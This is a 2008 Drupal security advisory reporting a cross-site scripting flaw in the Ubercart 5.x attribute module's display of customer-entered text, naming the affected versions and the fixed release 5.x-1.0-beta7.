Support for Drupal 7 is ending on 5 January 2025—it’s time to migrate to Drupal 10! Learn about the many benefits of Drupal 10 and find migration tools in our resource center.
By Heine on
- Advisory ID: DRUPAL-SA-2008-020
- Project: Ubercart (third-party module)
- Version: 5.x
- Date: 2008-March-12
- Security risk: Less critical
- Exploitable from: Remote
- Vulnerability: Cross site scripting
Description
The attribute module allows customers to enter a text value as an attribute for a product, like a name to stitch into a hat. However, when these text values were displayed in the shopping cart or on order pages, there was a possibility for a malicious user to perform a cross site scripting attack.
All users are encouraged to update to the latest version, but this notice specifically applies to users who have installed the core attribute module and allow customers to enter custom text for attributes on products in their stores.
Versions affected
- Ubercart for Drupal 5.x prior to 5.x-1.0-beta7
Drupal core is not affected. If you do not use the contributed Ubercart module, there is nothing you need to do.
Solution
Install the latest version:
- If you use Drupal 5.x install Ubercart 5.x-1.0-beta7.
See also the Ubercart project page.
Reported by
j_ten_man reported an issue in the Ubercart forums related to this problem that an Ubercart developer was able to diagnose and fix immediately.
Contact
The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.
